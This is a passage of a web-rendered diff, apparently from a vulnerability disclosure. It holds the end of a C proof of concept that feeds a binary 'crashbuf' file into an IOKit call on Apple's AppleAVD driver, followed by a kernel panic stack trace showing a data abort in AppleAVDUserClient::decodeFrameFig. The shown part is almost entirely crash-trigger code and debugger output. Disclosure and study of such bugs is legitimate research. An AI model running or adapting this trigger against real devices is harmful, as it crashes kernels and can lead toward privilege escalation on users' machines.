     208 + char* yourFilePath = "./crashbuf";
     209 + pFile = fopen(yourFilePath,"rb");
     210 + fread(fb, 1, 0x880, pFile);
     211 + fclose(pFile);
     212 + sync();
     213 +
     214 + void* fbo = malloc(0xe78);
     215 +
     216 + size_t fbl=0xe78;
     217 +
     218 +
     219 +
     220 +
     221 +
     222 +
     223 + IOConnectCallMethod(
     224 + conn,
     225 + 2,
     226 + inputScalar,
     227 + inputScalarCnt,
     228 + fb,
     229 + 0x880,
     230 + outputScalar,
     231 + &outputScalarCnt,
     232 + fbo,
     233 + &fbl);
     234 +
     235 +
     236 + }
     237 + IOServiceClose(conn);
     238 +
     239 + return 0;
     240 +}
     241 +
     242 +
     243 +
     244 + 
  • crashbuf
    Binary file.
  • ■ ■ ■ ■ ■ ■
    stacktrace
     1 +* thread #15, name = '0xfffffe24ce46d960', queue = 'cpu-4'
     2 +* frame #0: 0xfffffe00149a5128 kernel.release.t8101`DebuggerTrapWithState(db_op=<unavailable>,
     3 +db_message=<unavailable>, db_panic_str="%s at pc 0x%016llx, lr 0x%016llx (saved state: %p%s)\n\t
     4 +x0: 0x%016llx x1: 0x%016llx x2: 0x%016llx x3: 0x%016llx\n\t x4: 0x%016llx x5: 0x%016llx x6:
     5 +0x%016llx x7: 0x%016llx\n\t x8: 0x%016llx x9: 0x%016llx x10: 0x%016llx x11: 0x%016llx\n\t x12:
     6 +0x%016llx x13: 0x%016llx x14: 0x%016llx x15: 0x%016llx\n\t x16: 0x%016llx x17: 0x%016llx x18:
     7 +0x%016llx x19: 0x%016llx\n\t x20: 0x%016llx x21: 0x%016llx x22: 0x%016llx x23: 0x%016llx\n\t x24:
     8 +0x%016llx x25: 0x%016llx x26: 0x%016llx x27: 0x%016llx\n\t x28: 0x%016llx fp: 0x%016llx lr:
     9 +0x%016llx sp: 0x%016llx\n\t pc: 0x%016llx cpsr: 0x%08x esr: 0x%08x far: 0x%016llx\n",
     10 +db_panic_args=0xfffffe3efed83218, db_panic_options=0, db_panic_data_ptr=<unavailable>,
     11 +db_proceed_on_sync_failure=1, db_panic_caller=<unavailable>) at debug.c:673:2 [opt]
     12 +frame #1: 0xfffffe00149a4cf0 kernel.release.t8101`panic_trap_to_debugger(panic_format_str="%s at
     13 +pc 0x%016llx, lr 0x%016llx (saved state: %p%s)\n\t x0: 0x%016llx x1: 0x%016llx x2: 0x%016llx x3:
     14 +0x%016llx\n\t x4: 0x%016llx x5: 0x%016llx x6: 0x%016llx x7: 0x%016llx\n\t x8: 0x%016llx x9:
     15 +0x%016llx x10: 0x%016llx x11: 0x%016llx\n\t x12: 0x%016llx x13: 0x%016llx x14: 0x%016llx x15:
     16 +0x%016llx\n\t x16: 0x%016llx x17: 0x%016llx x18: 0x%016llx x19: 0x%016llx\n\t x20: 0x%016llx x21:
     17 +0x%016llx x22: 0x%016llx x23: 0x%016llx\n\t x24: 0x%016llx x25: 0x%016llx x26: 0x%016llx x27:
     18 +0x%016llx\n\t x28: 0x%016llx fp: 0x%016llx lr: 0x%016llx sp: 0x%016llx\n\t pc: 0x%016llx cpsr:
     19 +0x%08x esr: 0x%08x far: 0x%016llx\n", panic_args=0xfffffe3efed83218, reason=0,
     20 +ctx=0x0000000000000000, panic_options_mask=0, panic_data_ptr=0x0000000000000000,
     21 +panic_caller=18446741875040538756) at debug.c:1068:2 [opt]
     22 +frame #2: 0xfffffe00151cc6bc kernel.release.t8101`panic(str=<unavailable>) at debug.c:885:2 [opt]
     23 +frame #3: 0xfffffe00151d5084 kernel.release.t8101`panic_with_thread_kernel_state(msg="Kernel data
     24 +abort.", ss=0xfffffe3efed834f0) at sleh.c:601:2 [opt]
     25 +frame #4: 0xfffffe0014adca0c kernel.release.t8101`handle_kernel_abort(state=0xfffffe3efed834f0,
     26 +esr=2516582471, fault_addr=0xfffffe8ff9f2a548, fault_code=FSC_TRANSLATION_FAULT_L3,
     27 +fault_type=3, expected_fault_handler=<unavailable>) at sleh.c:2391:2 [opt]
     28 +frame #5: 0xfffffe0014adaaf4 kernel.release.t8101`sleh_synchronous [inlined]
     29 +handle_abort(state=0xfffffe3efed834f0, esr=2516582471, fault_addr=0xfffffe8ff9f2a548, inspect_abort=
     30 +<unavailable>, handler=<unavailable>, expected_fault_handler=0x0000000000000000) at sleh.c:1225:2
     31 +[opt]
     32 +frame #6: 0xfffffe0014adaae0 kernel.release.t8101`sleh_synchronous(context=0xfffffe3efed834f0,
     33 +esr=2516582471, far=0xfffffe8ff9f2a548) at sleh.c:843:3 [opt]
     34 +frame #7: 0xfffffe00149537f8 kernel.release.t8101`fleh_synchronous + 40
     35 +frame #8: 0xfffffe001494cbc0 kernel.release.t8101`__bzero + 32
     36 +frame #9: 0xfffffe00153efa50
     37 +AppleAVD`AppleAVDUserClient::decodeFrameFig(_sAppleAVDDecodeFrameFigIn*,
     38 +_sAppleAVDDecodeFrameFigOut*) + 956
     39 +frame #10: 0xfffffe00153ed7dc AppleAVD`AppleAVDUserClient::externalMethod(unsigned int,
     40 +IOExternalMethodArguments*, IOExternalMethodDispatch*, OSObject*, void*) + 136
     41 +frame #11: 0xfffffe001512c3d8
     42 +kernel.release.t8101`::is_io_connect_method(connection=0xfffffe2998a0c000, selector=2, scalar_input=
     43 +<unavailable>, scalar_inputCnt=0, inband_input=<unavailable>, inband_inputCnt=<unavailable>,
     44 +ool_input=<unavailable>, ool_input_size=<unavailable>, inband_output="",
     45 +inband_outputCnt=0xfffffe2fff94682c, scalar_output=0xfffffe3efed83b20,
     46 +scalar_outputCnt=0xfffffe3efed83b1c, ool_output=0, ool_output_size=0xfffffe299a7488d4) at
     47 +IOUserClient.cpp:4856:17 [opt]
     48 +frame #12: 0xfffffe0014aaab3c
     49 +kernel.release.t8101`_Xio_connect_method(InHeadP=0xfffffe299a748000, OutHeadP=0xfffffe2fff946800)
     50 +at device_server.c:8389:18 [opt]
     51 +frame #13: 0xfffffe00149ab804 kernel.release.t8101`ipc_kobject_server at ipc_kobject.c:473:3 [opt]
     52 +frame #14: 0xfffffe00149ab378 kernel.release.t8101`ipc_kobject_server(port=<unavailable>,
     53 +request=0xfffffe1fff559c00, option=<unavailable>) at ipc_kobject.c:580:8 [opt]
     54 +frame #15: 0xfffffe001497d288 kernel.release.t8101`ipc_kmsg_send(kmsg=<unavailable>, option=3,
     55 +send_timeout=0) at ipc_kmsg.c:2281:10 [opt]
     56 +frame #16: 0xfffffe0014998474 kernel.release.t8101`mach_msg_overwrite_trap(args=<unavailable>)
     57 +at mach_msg.c:371:8 [opt]
     58 +frame #17: 0xfffffe0014acfc38 kernel.release.t8101`mach_syscall(state=0xfffffe1b3477b1b0) at
     59 +bsd_arm64.c:282:11 [opt]
     60 +frame #18: 0xfffffe0014adab80 kernel.release.t8101`sleh_synchronous [inlined]
     61 +handle_svc(state=0xfffffe1b3477b1b0) at sleh.c:2436:3 [opt]
     62 +frame #19: 0xfffffe0014adab10 kernel.release.t8101`sleh_synchronous(context=0xfffffe1b3477b1b0,
     63 +esr=<unavailable>, far=0x000000010ec00000) at sleh.c:800:3 [opt]
     64 + 
     65 +frame #20: 0xfffffe00149537f8 kernel.release.t8101`fleh_synchronous + 40
     66 + 
Please wait...
Page is in error, reload to recover